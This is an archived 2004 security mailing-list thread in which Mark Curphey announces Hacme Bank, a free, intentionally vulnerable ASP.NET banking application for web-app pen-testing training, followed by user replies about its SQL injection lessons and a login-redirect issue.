RE: Hacme Bank

From: Mark Curphey (mark@curphey.com)
Date: Fri Sep 10 2004 - 00:49:08 EDT


Glad you liked the blind SQL injection;-) My personal fav is the poor crypto one in the account fields which is seen all too often in the real world but rarely found.

After 5 (I think) bad attempts we reset your session which would see any subsequent request redirected to the login page. It maybe that. Try and send me the results off-line (so we avoid support on webappsec) and we can fine tune any configs or make changes if you have found a bug.

Cheers

Mark

---- Jeremy Junginger <jj@act.com> wrote:
>
> Great tool! Lesson 1 a nice way to integrate the nexgenss advanced sql
> injection techniques into a simulated environment. I have a question,
> though, and it may be misconfiguration on the server side on my part, but
> after I've logged in successfully with inserted account credentials and I
> click on account details, I get thrown back to
> http://redmrtg/hacmebank/Login.aspx?lmsg=Re-login Any tips? Thanks!
>
> -----Original Message-----
> From: Rush Molekilla [mailto:molekilla@gmail.com]
> Sent: Thursday, September 09, 2004 6:28 AM
> To: Mark Curphey
> Cc: webappsec@securityfocus.com; pen-test@securityfocus.com
> Subject: Re: Hacme Bank
>
>
> Nice app!
>
> The only problem I had while trying to hack ASP.NET Application in localhost
> with my tool (Ecyware GreenBlue Inspector) is that both use the .NET thread
> pool.
>
> But nice ASP.NET, super great.
>
> Thanks,
>
> Rogelio Morrell C.
> Ecyware
>
>
> On Wed, 8 Sep 2004 10:03:43 -0400, Mark Curphey <mark@curphey.com> wrote:
> > Just to let you know in the next hour or so the links should go live
> > to our new free tool, Hacme Bank on the Foundstone web site
> > (http://www.foundstone.com/s3i).
> >
> > You can see the press release here;
> >
> > http://www.tmcnet.com/usubmit/2004/Sep/1071232.htm
> >
> > It's an online banking application written in C# ASP.NET (requires IIS
> > and .NET framework 1.1 to install) with a set of security holes
> > replicating real world things we have found in client engagements over
> > the last 9 months. It serves as a "real world" training application
> > for web application pen testing and education for developers.
> >
> > Its free for non-commercial use and we are already working on the next
> > version to include some more user management issues.
> >
> > All of the lessons are screen captured and documented so you can step
> > through all of the issues. These are in a "User and Solution Guide"
> > PDF in the web root by default.
> >
> > It is not designed to be a good benchmarking platform for automated
> > tools but it is interesting to compare the results of your favorite
> > tools with the holes in the bank (we have done this) or put it behind
> > a "web app firewall" (no uptake from my recent challenge I am afraid,
> > go figure!).
> >
> > The experienced can start attacking the login field when installed and
> > the less experienced can walk through the lesson plans.
> >
> > Mark
> >
> >
>
>
>
> ------------------------------------------------------------------------------
> Ethical Hacking at the InfoSec Institute. All of our class sizes are
> guaranteed to be 12 students or less to facilitate one-on-one interaction
> with one of our expert instructors. Check out our Advanced Hacking course,
> learn to write exploits and attack security infrastructure. Attend a course
> taught by an expert instructor with years of in-the-field pen testing
> experience in our state of the art hacking lab. Master the skills of an
> Ethical Hacker to better assess the security of your organization.
>
> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
> -------------------------------------------------------------------------------
>
>
>

------------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. All of our class sizes are
guaranteed to be 12 students or less to facilitate one-on-one interaction
with one of our expert instructors. Check out our Advanced Hacking course,
learn to write exploits and attack security infrastructure. Attend a course
taught by an expert instructor with years of in-the-field pen testing
experience in our state of the art hacking lab. Master the skills of an
Ethical Hacker to better assess the security of your organization.

http://www.infosecinstitute.com/courses/ethical_hacking_training.html
-------------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:05 EDT